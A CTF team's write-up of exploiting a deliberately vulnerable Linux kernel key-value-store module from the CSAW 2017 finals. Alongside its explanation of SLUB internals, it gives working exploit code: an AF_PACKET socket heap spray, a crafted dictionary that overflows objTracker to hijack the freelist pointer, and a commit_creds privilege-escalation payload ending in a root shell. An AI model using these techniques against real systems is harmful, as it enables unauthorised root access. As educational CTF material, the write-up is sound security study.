As team NOPS we took part in the European edition of the CSAW 2017 finals, held in Valence (FR). The overall experience was really enjoyable and, after 24 hours of competition, we ranked 2nd!
In this post we will show how we solved kws2. This was the second part of a two-stage challenge and so it was accessible only after solving the first part. We will cover only the second part here, but the curious reader can find a detailed walk-through of the first one here.
Unfortunately we solved the challenge only weeks after the CTF ended. Kudos to Eat Sleep Pwn Repeat for solving it a few hours after the finals started!
kws2 is a vulnerable kernel module, and thus the goal of the challenge - as you might imagine - is to exploit it and gain root on the box. Long story short: the module is a key-value store for Python objects running at ring 0 (yes, you read that right!).
The challenge source code was released by the organizers during the competition and can be found along with the kernel module here. The challenge was hosted on a standard Ubuntu 16.04.3 running Linux kernel 4.4.0-98. The only security feature shipped with this kernel was KASLR, so SMEP, SMAP and SLUB freelist randomization were not in place.
The source code of the challenge is pretty long, so we will focus only on the interesting parts. The first function executed is init_module, which gets called when the module is inserted. This function does nothing crazy: it initializes a hashmap used to track the objects and registers a device (/dev/kws) using the misc_register kernel function. The latter makes the freshly created device accessible through the ioctl syscall.
```c
static struct file_operations fops = {
    .owner = THIS_MODULE,
    .unlocked_ioctl = handleIoctl
};

static struct miscdevice dev = { MISC_DYNAMIC_MINOR, "kws", &fops };

int init_module(void)
{
    printk("Hello world\n");
    mainMap = kmalloc(sizeof(struct Hashmap), GFP_KERNEL);
    hashmapInit(mainMap);
    int ret = misc_register(&dev);
    return 0;
}
```
The function which handles the user-space issued ioctls is
handleIoctl
(also redacted to leave only the interesting part).
```c
static int handleIoctl(struct file *f, unsigned int cmd, void** arg)
{
    printk("Got IOCTL %x\n", cmd);
    if (cmd == 1) { // store
        void* key_ptr;
        void* value_ptr;
        if (get_user(key_ptr, arg) || get_user(value_ptr, &arg[1]))
            return -EINVAL;
        struct Object* key = deserializeRoot(key_ptr);
        if (key == NULL)
            return -EINVAL;
        struct Object* value = deserializeRoot(value_ptr);
        if (value == NULL)
            return -EINVAL;
        hashmapInsert(mainMap, key, value);
        printk("Successfully created object\n");
        return 0;
    }
    if (cmd == 4) { // get
        [redacted]
    }
    if (cmd == 5) { // delete
        [redacted]
    }
    return EINVAL;
}
```
To comply with standard key-value store APIs, kws2 implements three methods: store, get and delete. Let's break down the case where the user issues a store command. First the function retrieves the key and the value passed by the user (using get_user), then deserializes them (using deserializeRoot) and finally inserts the two into a hashmap. And here is where the real fun begins. deserializeRoot - which takes as input a pointer to a Python object - allocates an array of 200 pointers on the kernel heap, zeroes the objCount variable and then passes the Python object pointer to deserialize.
```c
struct Object {
    int type;
    void* data;
};

struct Object* deserializeRoot(void* ptr)
{
    objTracker = kmalloc(sizeof(void*) * 200, GFP_KERNEL);
    memset(objTracker, 0, sizeof(void*) * 200);
    objCount = 0;
    struct Object* root = deserialize(ptr);
    if (root == NULL)
        return NULL;
    [...redacted...]
}

struct Object* deserialize(void* ptr)
{
    int type = getType(ptr);
    if (!type)
        return NULL;
    struct Object* obj = NULL;
    if (type == TYPE_DICT) {
        // Check if we used this pointer yet.
        // If we did don't do it again to prevent circular structure
        for (int i = 0; i < objCount; i++) {
            if (objTracker[i*2] == ptr)
                return NULL;
        }
        obj = deserializeDict(ptr);
        trackObject(ptr, obj);
        return obj;
    } else if (type == TYPE_STRING || type == TYPE_INT || type == TYPE_FLOAT) {
        return deserializePrimative(ptr);
    } else {
        return NULL;
        printk("Unknown..\n");
    }
}

struct Object* deserializePrimative(void* ptr)
{
    int type = getType(ptr);
    if (!type)
        return NULL;
    struct Object* obj;
    if (type == TYPE_INT || type == TYPE_FLOAT) {
        uint64_t value;
        if (get_user(value, (uint64_t*)(ptr+0x10)))
            return NULL;
        obj = kmalloc(sizeof(struct Object), GFP_KERNEL);
        obj->data = value;
    } else {
        obj = deserializeString(ptr);
    }
    obj->type = type;
    trackObject(ptr, obj);
    return obj;
}

void trackObject(void* ptr, struct Object* obj)
{
    objTracker[objCount*2] = ptr;
    objTracker[objCount*2+1] = obj;
    objCount++;
}
```
Depending on the type of the Python object, deserialize calls two different functions:

- deserializeDict: which handles Python dictionaries;
- deserializePrimative: which handles Python str, int and float.

Both functions parse the userspace object and create an equivalent kernel version of it (struct Object). The new object and the userspace one are saved by trackObject into the objTracker array. This function takes a pointer to each object and stores them in two adjacent positions of objTracker without checking the value of objCount. And this is exactly where the bug lies. objTracker was allocated earlier with a static size of 200 pointers, so what happens if, for example, we pass a dictionary with 150 keys and 150 values? There we go: we just got a kernel heap overflow!
Hopefully this walk-through of the code was enough to give a proper background on how the challenge works. Before moving on to exploitation, it's important to bear in mind how the kernel allocates heap objects.
The general-purpose allocator used by the kernel of this challenge is the SLUB allocator. We want to give you a quick overview of how it manages memory in kernel-land, to better understand the following sections of this writeup. If you are curious to examine it more in depth, you can have a look at the files mm/slub.c and mm/slab_common.c of the kernel source code.
In kernel space performance matters and kernel object allocation has to be as fast as possible. For this reason the SLUB allocator has a variable number of caches, each of which is specific to a particular type of object. For example, all the inode objects allocated by the kernel are stored in the inode_cache, while task_struct objects are contained in the task_struct cache. Moreover, there exist some general-purpose caches which contain objects of similar size. For example, kmalloc-512 contains all the objects with 256 < size <= 512. You can monitor all the cache types your system is using by reading /proc/slabinfo.
Imagine caches as big cardboard boxes with different labels on them. If you open
one of these boxes you will find some other smaller boxes inside. These are
called slabs
. A slab is nothing more than a set of contiguous memory pages reserved by the kernel. Imagine the memory pages as even smaller boxes, this time contained in the slab boxes. This is where we can finally store our objects.
Let's go up one level and say something more about slabs. The kernel must be fast and it must orchestrate concurrency among different CPUs. For this reason the SLUB allocator has two different kinds of slabs: CPU-private slabs (struct kmem_cache_cpu) and shared slabs (struct kmem_cache_node). Operations on the per-CPU slabs do not need any locks (fast-path), while shared slabs (slow-path) can be accessed by every CPU.
The crucial part in understanding how we exploited this challenge is the freelist pointer, which points to the first free slot of a slab. The SLUB allocator provides per-CPU freelists (fast-path) and a shared freelist (slow-path) for every cache. The head of the freelist is retrieved from kmem_cache_cpu or, if the list is empty, from a struct page given back by kmem_cache_node. The freelist itself is stored in the free slots of a slab.
Every time we call kmalloc(), the allocation is performed at the address pointed to by the head of the freelist. In this free slot, usually at offset 0, there is a pointer to the next free slot, which becomes the new head of the freelist.
It is clear that if we can overflow an object in a slab, sooner or later we will end up hijacking the freelist.
The first thing we tried was the 101 of kernel heap exploitation: allocate a kernel object adjacent to objTracker and overflow into it. Remember that the size of objTracker is 1600 bytes, so it will be allocated in kmalloc-2048. Since the kernel has plenty of objects, we wrote a gdb-python script to find suitable ones. In this context, suitable means that the object has to contain at least one function pointer and satisfies 1025 < size <= 2048. The output of the script can be found here. As you can see, the script found 51 structures which respect these two constraints. Some of them look "more promising" than others. An implicit constraint, never explicitly pointed out, is that the object has to be allocatable from userland, for example through a system call. In this sense struct tcp_sock sounds like a better target than struct pci_bus.
All of our attempts at solving the challenge this way failed miserably: the kernel always segfaulted. After targeting several structures, we realized that the kernel always checks or uses some fields of the structure before calling an overwritten function pointer. Given the constraints of the overflow, these fields always ended up with meaningless, uncontrollable values, thus making the kernel panic.
As of today, it is still an open question for us whether it is possible to succeed using this strategy. What came out of further discussion and reading is that it is indeed possible to "massage" the slab and allocate, close to each other, structures belonging to different caches (and so having sizes outside the 1025-2048 range). Frankly, we didn't try this solution because in the meantime we became aware of the existence of the holy grail of SLUB exploitation: the fearsome freelist pointer.
The kernel is very sensitive, and memory corruption on the kernel heap must be handled with care. Our initial exploitation plan was not easy to manage because it forced us to corrupt all the memory up to a function pointer. Our next approach was instead to control the freelist pointer and force the kernel to allocate memory in userspace. This is doable since SMAP and SMEP are not enabled. Moreover, once the kernel allocates an object in user memory, we can easily overwrite a function pointer to achieve privilege escalation.
The general algorithm of our final exploit works like this:

1. fill the holes in kmalloc-2048 so that subsequent allocations are adjacent;
2. make the module allocate objTracker, overflow it and corrupt the successive free object "metadata" with a userspace address;
3. allocate objects in the same cache until the kernel hands one out in userspace;
4. overwrite a function pointer of that object and trigger it.

Now the details.
Our favorite candidate, both to massage the kernel heap and to carry out the exploitation, was struct packet_sock, allocated by the kernel when we create a socket of type AF_PACKET. It also has a function pointer at byte offset 1304, named xmit. For reference, the same object was used here by Andrey Konovalov to exploit a vulnerability in packet sockets.
The first step is to fill the holes in kmalloc-2048. In this way we reach a point where subsequent allocations in this cache are adjacent in memory. 350 AF_PACKET sockets seemed to be enough on our machine:
```c
for (i = 0; i < 350; i++) {
    int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    if (s < 0) {
        perror("[-] socket(AF_PACKET)");
        exit(EXIT_FAILURE);
    }
}
```
At this point it's time to craft an ad-hoc Python dictionary that will overflow its 2048B boundary and write a userspace address into the next-free-object metadata of the adjacent object. Fortunately, we can forget about the low-level implementation details of Python dictionaries, since we can use the Python APIs from C. Remember that objTracker can store 200 pointers at most. The vulnerable kernel module stores 2 pointers for a dictionary key and 2 pointers for the linked value. The first pointer keeps track of the Python object in userspace, while the second is a kernelspace pointer. In other words, for each key/value pair in the Python dictionary we get 4 slots occupied in objTracker. If the dictionary has more than 50 entries, we are overflowing objTracker. On the other hand, if the size is 64 we perfectly fill up our memory slot in kmalloc-2048. From now on, if we prepare a dictionary with even more elements, we will corrupt the next slot on the slab.
The plan is to create a dictionary with 65 entries: the 65th entry will make the module overwrite the address of the next free object in the slab with an address we control.
```c
PyObject *setup_object(PyObject **ptr)
{
    long i = 0;
    PyObject *dict = PyDict_New();
    PyObject *val;

    for (i = 0; i < 64; i++) {
        val = PyInt_FromLong(i);
        PyDict_SetItem(dict, val, val);
    }
    while (1) {
        val = PyInt_FromLong(i++);
        if (((unsigned long)val & 0xfff) == 0) {
            PyDict_SetItem(dict, val, val);
            printf("[.] obj 65 = %p\n", (void *)val);
            break;
        }
    }
    *ptr = val;
    return dict;
}
```
The code above creates a dictionary that in Python terms would look like {0:0, 1:1, 2:2, ..., 63:63}. The insertion of the 65th element is a little different: we insert a Python int, as both key and value, only when the interpreter gives us an object stored at a page-aligned memory address.
The module expects this dictionary as a value, so we associate a random key with it and finally pass everything to the kernel through an ioctl call.
```c
PyObject *dict = setup_object((PyObject **) &ptr);
PyObject *key = PyString_FromString("a");

data[0] = (void *) key;
data[1] = (void *) dict;

printf("[.] send to kernel\n");
fd = open("/dev/kws", O_WRONLY);
if (fd == -1) {
    printf("[-] cannot open /dev/kws\n");
    return 0;
}

rv = ioctl(fd, 1, data);
if (rv == -1) {
    perror("[-] ioctl()");
    return 0;
}
```
At this point the freelist pointer is already corrupted!
```c
memset((void *)ptr, 0, 0x800);
```
First of all, we zero out the userspace free slot the kernel is going to use. This way, when the kernel allocates the target object in userspace, it will find 0 as the freelist pointer, ensuring that the kernel will request a new page for future allocations and will not dereference whatever value was written at ptr.
```c
printf("[.] corrupt SLUB freelist\n");

/* Take free slot where objTracker was sitting before */
sk = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
/* Take adjacent slot with our next-free pointer */
sk = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
/* Take dummy free slot on userspace */
sk = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
```
We have to allocate three objects in the cache we are attacking. With the first packet socket, the kernel allocates an object where objTracker was sitting before being freed. With the second socket, the kernel overwrites the freelist head with our controlled address. This means that the next time a 2048B object is requested, the kernel will store it in user space. Bingo! Since we use AF_PACKET, we can overwrite the xmit() function pointer with the address of our get_root_payload(). Of course, the payload must also be easy to trigger: for AF_PACKET, xmit() is called whenever a user sends a packet on the packet socket.
Below you can see the payload to escalate privileges... nothing new, the same stuff already seen thousands of times.
```c
#define COMMIT_CREDS        0xffffffff810a2850ul
#define PREPARE_KERNEL_CRED 0xffffffff810a2c40ul

typedef unsigned long __attribute__((regparm(3))) (*_commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (*_prepare_kernel_cred)(unsigned long cred);

void get_root_payload(void)
{
    ((_commit_creds)COMMIT_CREDS)(
        ((_prepare_kernel_cred)PREPARE_KERNEL_CRED)(0)
    );
}
```
If everything worked correctly, get_shell
should have forked a privileged shell.
```
[.] starting
[.] namespace sandbox set up
[.] commit_creds: ffffffff810a2850
[.] prepare_kernel_cred: ffffffff810a2c40
[.] padding heap
[.] setup Py object
[.] obj 65 = 0x1441000
[.] trigger
root@ubuntu:/home/user#
root@ubuntu:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/home/user#
```
The full exploit code can be found here.
Overall we had a lot of fun exploiting this challenge and learned a lot about the inner workings of the kernel allocator. Kudos to the challenge creator and the organizers for such a nice challenge!
published on 2018-01-25 by invano, pagabuc, nsr